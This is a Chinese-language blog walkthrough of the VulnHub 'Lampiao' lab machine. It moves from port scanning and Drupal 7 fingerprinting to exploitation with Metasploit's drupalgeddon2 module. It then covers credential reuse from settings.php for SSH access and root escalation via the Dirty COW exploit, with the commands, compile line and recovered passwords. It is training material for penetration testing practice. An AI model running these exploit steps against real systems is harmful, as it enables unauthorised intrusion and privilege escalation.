VulnHub靶场之Lampiao

VulnHub靶场之Lampiao

最近事情有点多,但是还是要抽出点时间来学习的!!!
老样子,Lampiao虚拟机先启动,然后再启动kali!!
Lampiao虚拟机启动如下,不知账户密码,估摸着和上次那个靶机是差不多的!!!
VulnHub靶场之Lampiao_第1张图片
打开kali,使用命令查看kali的ip:
VulnHub靶场之Lampiao_第2张图片
使用nmap进行主机扫描:nmap -sP 192.168.80.1/24
VulnHub靶场之Lampiao_第3张图片
继续使用nmap扫描端口:nmap -p 1-65535 -sV 192.168.80.129
VulnHub靶场之Lampiao_第4张图片
开放了,22端口和80端口,1898端口
22端口,尝试ssh弱口令爆破,没有结果,,,
这里就不多说ssh弱口令爆破了,基本上百度都能搜得到,使用msf
80端口也没有是没有用的信息
访问一下http://192.168.80.129:1898/,这个页面我也没发现什么东西,,,,
VulnHub靶场之Lampiao_第5张图片
ok,对该网站进行信息收集
先手动进行信息收集,发现存在robots.txt:
VulnHub靶场之Lampiao_第6张图片
查看一下CHANGELOG.txt文件,发现网站的版本信息:
VulnHub靶场之Lampiao_第7张图片
OK,再进行下一步,直接跑一下目录!!!
VulnHub靶场之Lampiao_第8张图片
emmm,目录贼多,,,,再include里面看见有什么数据库的配置文件之类的
好像没什么卵用,毕竟PHP文件是看不见内容的
VulnHub靶场之Lampiao_第9张图片
到此不知该如何,,,,
仔细想想还是有条路的,既然我们知道网站的搭建框架Drupal 7
那么我们可以直接使用百度搜索一下该搭建框架的漏洞:
VulnHub靶场之Lampiao_第10张图片
找到一个CVE漏洞,,,,
既然有CVE漏洞编号,那就好办了,直接去kali上的msf进行search:
VulnHub靶场之Lampiao_第11张图片
找到了,直接利用该漏洞:use exploit/unix/webapp/drupal_drupalgeddon2
然后show一下需要设置的参数
VulnHub靶场之Lampiao_第12张图片
ok,需要我们设置端口和ip,直接设置:

msf exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.80.129
RHOST => 192.168.80.129
msf exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898
RPORT => 1898
msf exploit(unix/webapp/drupal_drupalgeddon2) > run

成功拿到shell:
VulnHub靶场之Lampiao_第13张图片
emmm,以写入文件的方式获取标准shell失败:
在这里插入图片描述
换一种方法:python -c 'import pty; pty.spawn("/bin/bash")',成功:
VulnHub靶场之Lampiao_第14张图片
发现是www-data用户,这说明需要我们进行提权!!
同时,也发现了许多没有扫描出来的文件
VulnHub靶场之Lampiao_第15张图片
打开qrc.png发现是 一个二维码,扫出来的结果是 Try harger! muahuahuahua:
VulnHub靶场之Lampiao_第16张图片
打开audio.m4a,无语什么都没有:
VulnHub靶场之Lampiao_第17张图片
打开LuizGonzaga-LampiaoFalou.mp3,一段2分多钟的mp3,感觉没有什么东西
打开lampiao.jpg,是一张图片,好像也什么都没有
emmm,没啥提示啊,查找用户名:cd /home | ls -l
在这里插入图片描述
找到了用户名,但是我们不知道密码怎么办,,,不慌,一般网站有数据库的配置文件
继续翻找配置信息,,,,在/var/www/html/sites/default/settings.php中找到了配置信息!!
VulnHub靶场之Lampiao_第18张图片

'username' => 'drupaluser'
'password' => 'Virgulino'

登录数据库看看:
VulnHub靶场之Lampiao_第19张图片
在drupal数据库中有user表,第一个用户就是tiago,密码貌似也不是md5加密,不知道了,,,
VulnHub靶场之Lampiao_第20张图片
后面不知道怎么办,查看大佬博客才知道,可以直接使用数据库的密码进行ssh登录,,,,
输入命令:ssh [email protected],密码就是:Virgulino,成功登入:
VulnHub靶场之Lampiao_第21张图片
那么接下来应该就是提权了,,,,
用uname -a 查看一下内核版本,16年的:
在这里插入图片描述
搜索一下漏洞,找到脏牛提权(CVE-2016-5195)
VulnHub靶场之Lampiao_第22张图片
使用命令:cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~,copy到当前目录:
在这里插入图片描述
然后在靶机上创建目录文件,写入到文件中:
VulnHub靶场之Lampiao_第23张图片
(emmm,1.cpp编译时出错,直接在重新创建一个文件40847.cpp)
然后编译运行:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
参数解释:

1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
4. -std=c++11就是用按C++2011标准来编译的
5. -pthread 在Linux中要用到多线程时,需要链接pthread库
6. -o dcow gcc生成的目标文件,名字为dcow

执行文件,输入命令:./40847,得到root密码!!!
在这里插入图片描述
使用ssh连接:ssh [email protected] 输入密码:dirtyCowFun,成功提权!!:
VulnHub靶场之Lampiao_第24张图片
成功get到flag:
在这里插入图片描述

总结:

这个靶场还是学到了很多的东西,比如说如何一步一步进行渗透,
虽说与真实的环境相差甚远,但是最主要了还是用来锻炼自己的能力,
在本篇的实验中还是存在很多的不足的!还是要靠百度来进行一步一步的探索
主要还是自己的知识面太窄了,比如说这个脏牛提权,我就不知道
看来以后还是要多扩大自己的知识面,前面的都还行,遇上一个实验差不多,
到了提权这一步就开始花里胡哨,自己就很懵比,就很难受!!!!
还是要多学习啊~~

你可能感兴趣的:(靶场实战)